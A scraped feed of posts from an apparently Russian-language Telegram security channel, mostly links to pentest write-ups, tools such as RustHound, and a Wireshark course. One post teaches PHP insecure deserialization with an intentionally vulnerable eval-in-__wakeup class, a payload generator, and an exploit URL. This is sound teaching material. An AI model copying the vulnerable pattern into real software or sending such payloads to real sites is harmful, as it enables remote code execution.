Business Logic Vulnerability_ Payment bypass.pdf
2.4 MB
Кажется, уже не надо никому доказывать, что уязвимости бизнес-логики выходят на первый план. Поэтому каждый райтап — на вес золота.
Vrushabh Doshi, Senior Security Engineer в GoKloud, делится опытом поиска и эксплуатации простых багов бизнес-логики.
👉 Читайте на Medium или в PDF
#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2
📌 Что вообще из себя представляет уязвимость под названием «Небезопасная десериализация»?
Небезопасная десериализация — это когда контролируемые нами данные десериализуются веб-приложением. Это позволяет манипулировать сериализованными объектами для передачи вредоносных данных в код приложения.
Для сериализации и десериализации в PHP используются функции
serialize(
) и unserialize()
.Первая принимает в качестве параметра объект и возвращает его сериализованное представление в виде строки. Вторая — строку, содержащую сериализованный объект, и возвращает десериализованный объект, восстановленный из этой строки.
📌 Простой пример:
<?php
class Injection {
public $some_data;
function __wakeup() {
if(isset($this->some_data)) {
eval($this->some_data);
}
}
}
if(isset($_REQUEST['data'])) {
$result = unserialize($_REQUEST['data'])
// do something with $result object //
}
В примере присутствует класс Injection, реализующий магический метод
__wakeup()
, который будет выполнен сразу после десериализации объекта класса Injection
и исполнит код, хранящийся в переменной класса $some_data
.📌 Сгенерируем пэйлоад для эксплуатации подобной конструкции:
<?php
class Injection{
public $some_data;
function __wakeup(){
if(isset($this->some_data)){
eval($this->some_data);
}
}
}
$inj = new Injection();
$inj->some_data = "phpinfo();";
echo(serialize($inj)); ?>
В результате выполнения кода получим сериализованный объект:
O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
И обратимся к нашему уязвимому приложению, передав в качестве данных в параметре
data
полученный сериализованный объект:https://example.com/vulnerable.php?data=O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
В результате исполнения данного кода и десериализации переданного объекта будет исполнена встроенная функция
phpinfo()
. Общий посыл должен быть понятен. Для эксплуатации небезопасной десериализации часто используется инструмент PHPGGC, который позволяет генерировать пэйлоад без необходимости проходить утомительные шаги по поиску гаджетов и их объединению.
#pentest #writeup #practice #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Fenrisk
Gadgets chain in Wordpress
Security experts
👍4⚡2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
This media is not supported in the widget
VIEW IN TELEGRAM
👍4
Что делать, если перепробовал все техники атак на инфраструктуру Windows и ничего не выгорело? Правильно, искать ошибки администрирования.
Читайте интересный пошаговый разбор взлома корпоративной сети и некоторые рекомендации по защите.
#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Побег из песочницы и захват леса — реальный сценарий взлома корпоративной сети
Пришло время рассказать о еще одном векторе атак на внутренние сети компаний. На этот раз речь пойдет о ситуации, в которой у меня не было прямого доступа к компьютеру, а хосты оказались неуязвимы к...
🔥3👍2
Главная фича — сохранение состояний подключений и процессов. После разрыва соединения с сервером вы подключаетесь, и все запущенные программы и процессы продолжают работать. Дополнительно можно работать совместно с другими в терминале, если все подключены к одной сессии.
А здесь вас ждет одна из лучших шпаргалок по работе с Tmux, которая включает базовые команды.
#cheatsheet #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥4❤2🥰2
🌎 ТОП-10: рейтинг лучших зарубежных работодателей в IT
При составлении рейтинга учитывали различные факторы из открытых данных портала Glassdoor, включая отзывы сотрудников, уровень лояльности действующих и бывших сотрудников, зарплата, льготы, бонусы и прочие бенефиты.
1️⃣ Red Hat
2️⃣ Gainsight
3️⃣ Box
4️⃣ MathWorks
5️⃣ ServiceNow
6️⃣ Marvell Technology
7️⃣ CrowdStrike
8️⃣ Fortinet
9️⃣ NetApp
🔟 Genentech
👉 Читать статью
При составлении рейтинга учитывали различные факторы из открытых данных портала Glassdoor, включая отзывы сотрудников, уровень лояльности действующих и бывших сотрудников, зарплата, льготы, бонусы и прочие бенефиты.
1️⃣ Red Hat
2️⃣ Gainsight
3️⃣ Box
4️⃣ MathWorks
5️⃣ ServiceNow
6️⃣ Marvell Technology
7️⃣ CrowdStrike
8️⃣ Fortinet
9️⃣ NetApp
🔟 Genentech
👉 Читать статью
🥱3👍2
This media is not supported in your browser
VIEW IN TELEGRAM
📌 В чем преимущества по сравнению с инструментом сбора данных SharpHound:
☑️ Кроссплатформенность
☑️ Меньше вероятность обнаружения антивирусами
☑️ Кросс-компиляция
☑️ Генерация JSON-файлов для различных доменнных сущностей
☑️ Модули и функции, которые расширяют базовый функционал
☑️ Оптимизация размера бинарного файла
☑️ Производительность: согласно представленной статистике,
RustHound
работает быстрее, чем SharpHound
и BloodHound.py
в тестах на контроллерах доменнов с большим количеством объектов LDAPВажно помнить, что
RustHound
все еще находится в разработке, и не все фичи SharpHound
реализованы.👉 GitHub
#tools #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Самые известные эксплуатируемые уязвимости в 2023 году по версии агентства по кибербезопасности и безопасности инфраструктуры (CISA).
⚙ Методология и ключевые выводы
#security
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3👏1
Domain of Thrones_ Part I. When Adversaries Play for Keeps.pdf
2.7 MB
⚔ Кроме того, автор предлагает эффективные стратегии восстановления, стремясь к более удовлетворительному решению, чем финал «Игры престолов».
👉 Читайте на Medium или в PDF
#redteam #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👏4
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Память как у пингвина: Работа памяти в Linux
Начнем издалека. В спецификации любого компьютера и в частности сервера непременно числится надпись "N гигабайт оперативной памяти" - именно столько в его распоряжении находится физической памяти....
👍5🔥3
Тут это, один исследователь просто отслеживал изменения в JavaScript-файлах и находил баги. $5k за два простых бага (раз и два) 🤷♂️
О мониторинге JS-файлов подробнее написано здесь, а пока ловите инструмент, который поможет отслеживать такие изменения и информировать о них в Telegram.
🛠 GitHub
#bugbounty #tools #recon
О мониторинге JS-файлов подробнее написано здесь, а пока ловите инструмент, который поможет отслеживать такие изменения и информировать о них в Telegram.
🛠 GitHub
#bugbounty #tools #recon
👍8🔥3💯3
• Введение
• Что такое WireShark
• Немного о протоколах, IP и OSI
• Установка и настройка WireShark
• Разбор интерфейса
• Фильтры протоколов, IP, портов
• Анализ HTTP-пакетов
• Демонстрация кражи учетных данных
• WireShark и Linux файрвол
• Обнаружение неавторизованного трафика
• Обзор командной строки
• Аргументы командной строки
• Захват трафика в файл и его дальнейший анализ
• Ограничения захвата файлов
• Фильтры захвата и отображения
• Обзор режимов сетевых карт
• Режим мониторинга
• Расшифрование захваченного трафика
• Форматирование вывода в файл cls
• Извлечение реальной информации (видео, фото и т. д.)
• WireShark и Nmap: виды сканирования и количество трафика
• Скрытое сканирование
• SSH туннелирование и захват трафика через интернет: введение
• Настройка удаленной машины и SSH
• tcpdump: установка и настройка захвата трафика
• Захват трафика с удаленного хоста
• Установка сервера, админки и клиента
• Необходимый софт и ОС
• Установка ОС
• Установка гостевых дополнений, установка SSH соединения с сервером
• Настройка файрвола на пропуск трафика
• Захват трафика с машины клиента
• Запрещаем доступ к определенным ресурсам
#security #tools #wireshark
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16👏2❤🔥1🔥1
Помимо специальных знаний в вашей ИБ-специализации, какие, по вашему мнению, знания не менее важны?
Anonymous Poll
29%
Программирование: знание конкретного языка
43%
Программирование: мыслить как разработчик, язык не так важен
36%
Сети: теория
45%
Сети: уметь настраивать и администрировать
30%
Операционные системы: теория
47%
Операционные системы: администрирование
43%
Английский язык
27%
Веб-технологии
18%
Математика
19%
Посмотреть результаты
👍7🔥1
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
👍4
👍6❤1🔥1